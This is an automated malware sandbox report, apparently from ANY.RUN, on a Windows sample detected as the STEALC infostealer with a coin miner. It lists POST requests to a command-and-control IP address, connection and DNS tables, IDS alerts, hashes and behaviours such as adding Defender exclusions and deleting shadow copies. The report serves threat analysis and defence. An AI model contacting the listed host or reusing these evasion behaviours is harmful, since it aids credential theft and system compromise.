2656	SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe	POST	200	45.141.233.187:80	http://45.141.233.187/b2e4b1161e324c08.php	unknown	—	—	unknown
2656	SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe	POST	200	45.141.233.187:80	http://45.141.233.187/b2e4b1161e324c08.php	unknown	—	—	unknown
2656	SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe	POST	200	45.141.233.187:80	http://45.141.233.187/b2e4b1161e324c08.php	unknown	—	—	unknown
2656	SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe	POST	200	45.141.233.187:80	http://45.141.233.187/b2e4b1161e324c08.php	unknown	—	—	unknown
6544	svchost.exe	GET	200	2.23.77.188:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D	unknown	—	—	whitelisted
2656	SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe	POST	200	45.141.233.187:80	http://45.141.233.187/b2e4b1161e324c08.php	unknown	—	—	unknown
2656	SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe	POST	200	45.141.233.187:80	http://45.141.233.187/b2e4b1161e324c08.php	unknown	—	—	unknown
2656	SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe	POST	200	45.141.233.187:80	http://45.141.233.187/b2e4b1161e324c08.php	unknown	—	—	unknown

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:137	—	—	—	whitelisted
—	—	51.104.136.2:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
—	—	2.16.168.124:80	crl.microsoft.com	Akamai International B.V.	RU	whitelisted
—	—	2.23.246.101:80	www.microsoft.com	Ooredoo Q.S.C.	QA	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
2656	SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe	45.141.233.187:80	—	Euro Crypt EOOD	DE	unknown
3216	svchost.exe	172.211.123.250:443	client.wns.windows.com	MICROSOFT-CORP-MSN-AS-BLOCK	FR	whitelisted
6544	svchost.exe	40.126.31.0:443	login.live.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
6544	svchost.exe	2.23.77.188:80	ocsp.digicert.com	AKAMAI-AS	DE	whitelisted
2104	svchost.exe	51.104.136.2:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted

DNS requests

Domain	IP	Reputation
settings-win.data.microsoft.com	51.104.136.2	whitelisted
crl.microsoft.com	2.16.168.124 2.16.168.114	whitelisted
google.com	142.250.185.206	whitelisted
www.microsoft.com	2.23.246.101 2.23.181.156	whitelisted
client.wns.windows.com	172.211.123.250	whitelisted
login.live.com	40.126.31.0 20.190.159.75 40.126.31.2 40.126.31.130 40.126.31.71 40.126.31.73 40.126.31.1 40.126.31.67	whitelisted
ocsp.digicert.com	2.23.77.188	whitelisted
slscr.update.microsoft.com	4.245.163.56	whitelisted
fe3cr.delivery.mp.microsoft.com	40.69.42.241	whitelisted
activation-v2.sls.microsoft.com	40.91.76.224	whitelisted

Threats

PID	Process	Class	Message
2656	SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe	Misc Attack	ET DROP Spamhaus DROP Listed Traffic Inbound group 5
2656	SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe	Potentially Bad Traffic	ET INFO Executable Download from dotted-quad Host
2656	SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe	Potential Corporate Privacy Violation	ET INFO PE EXE or DLL Windows file download HTTP
2656	SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe	Misc Attack	ET DROP Spamhaus DROP Listed Traffic Inbound group 8
2656	SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe	Potentially Bad Traffic	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
2656	SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe	Potentially Bad Traffic	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2656	SecuriteInfo.com.Win32.Evo-gen.2137.19052.exe	Potentially Bad Traffic	ET INFO Executable Download from dotted-quad Host
2196	svchost.exe	Not Suspicious Traffic	INFO [ANY.RUN] Online Pastebin Text Storage
2196	svchost.exe	Potential Corporate Privacy Violation	ET INFO Observed DNS Query to Coin Mining Domain (nanopool .org)

Add for printing

No debug info

General Info

SecuriteInfo.com.Win32.Evo-gen.2137.19052

9BE374511F90BD82DA2B1F929FAB0376

5201A60F2298E995C60A0B3FD4D123705D8017F7

8957216CF0FF3B340C066EA6DC984650D928E6479B4F67040632DA1652A1F5CD

98304:HkFt/7fA43jHhk6gu8TgFfp7zjwCAGZ7vFtRm+mg/Y+JvJDtmugmtjItxUONma1y:Iio

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

STEALC has been detected

Run PowerShell with an invisible window

Actions looks like stealing of personal data

Starts CMD.EXE for self-deleting

Uses Task Scheduler to run other applications

Changes the login/logoff helper path in the registry

Changes the Windows auto-update feature

Adds path to the Windows Defender exclusion list

Changes Windows Defender settings

Adds extension to the Windows Defender exclusion list

Uninstalls Malicious Software Removal Tool (MRT)

Deletes shadow copies

Vulnerable driver has been detected

MINER has been detected (SURICATA)

SUSPICIOUS

Reads the BIOS version

Searches for installed software

Reads security settings of Internet Explorer

There is functionality for taking screenshot (YARA)

Multiple wallet extension IDs have been found

Connects to the server without a host name

Starts process via Powershell

Starts POWERSHELL.EXE for commands execution

Starts CMD.EXE for commands execution

Starts NET.EXE to display or manage information about active sessions

Executable content was dropped or overwritten

Loads DLL from Mozilla Firefox

Process drops legitimate windows executable

Process requests binary or script from the Internet

Potential Corporate Privacy Violation

Reads the date of Windows installation

Uses TIMEOUT.EXE to delay execution

Application launched itself

Lists all scheduled tasks

Hides command output

The executable file from the user directory is run by the CMD process

Script adds exclusion path to Windows Defender

Windows service management via SC.EXE

Stops a currently running service

Starts SC.EXE for service management

The process deletes folder without confirmation

Uses powercfg.exe to modify the power settings

Script adds exclusion extension to Windows Defender

Process uninstalls Windows update

Executes as Windows Service

The process executes via Task Scheduler

Drops a system driver (possible attempt to evade defenses)

Connects to unusual port

INFO

Checks supported languages

Reads the computer name

Checks proxy server information

Reads CPU info

Creates files in the program directory

Themida protector has been detected

Creates files or folders in the user directory

The sample compiled with english language support

Process checks computer location settings

Reads the machine GUID from the registry

Checks if a key exists in the options dictionary (POWERSHELL)

Script raised an exception (POWERSHELL)

The sample compiled with japanese language support

Reads the software policy settings

Malware configuration

Static information

TRiD

EXIF

EXE